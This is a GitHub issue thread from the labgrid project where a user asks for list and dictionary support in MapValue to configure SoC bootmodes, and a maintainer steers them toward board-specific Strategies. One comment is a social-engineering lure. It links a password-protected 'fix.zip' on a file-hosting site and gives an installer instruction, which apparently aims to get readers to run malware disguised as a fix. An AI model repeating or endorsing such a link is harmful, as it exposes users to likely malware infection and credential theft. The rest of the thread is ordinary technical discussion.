labgrid-project/labgrid #1485: Add list and dict to MapValue

cidlik, 2024-08-26:
Hello!

**Problem**
I would add a new functionality to my fork (and yours project too if it likes you). It's SoC bootmode switching. Every SoCs have a specific count of bootmodes, thus I cannot list them into resource's attributes. I think that i can realize structure in `resources.yaml`:

```YAML
  bootmode:
    cls: RelayBootMode
    model: rodos
    host: 127.0.0.1
    description:
      boots: [2, 3, 4]
      mode0: [0, 0, 0]
      mode3: [0, 1, 1]
      mode7: [1, 1, 1]
```
but I cannot do this because `labgrid/remote/common.py::set_map_from_dict()` doesn't allow to use dictionaries and lists.
I saw in `labgrid/remote/proto/labgrid-coordinator.proto` a comment:
```
message MapValue {
  oneof kind {
    ...
    // FIXME do we need arrays?
  }
};
```
I thought that it is a use case when arrays and dictionaries may be used.

**Questions**
* Is this a right way to declare resources? Is it satisfy to your vision of the project?
* Can you support lists and dictionaries for attribute value?

Best regards,
cidlik

P.S. TY for your project, it's realy cool.

ZiQiangZhou, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

jluebbe, 2024-08-26:
We'd usually have this mapping as part of the board-specific Strategy, which then controls the individual PIO Resources.

cidlik, 2024-08-26:
@jluebbe TY for your answer!
I thought if client has "power" command (power switching is a part of strategy too, am i right?) then it is convenient to have "bootmode" command too.
Have you plans to support list and dictionary types for MapValue?

jluebbe, 2024-08-26:
You can use strategies with labgrid-client -s to configure the boot node PIOs as needed.

So far, I'm not convinced that support for nested dictionaries leads to a better design compared to handling this in Strategies. None of the Resources in labgrid itself need them. Accordingly, I'd prefer to keep it simple.

cidlik, 2024-08-26:
Ok, thanks for yours answers. I'll try to realize it over strategies.
Good luck!

closed 2024-08-26 by cidlik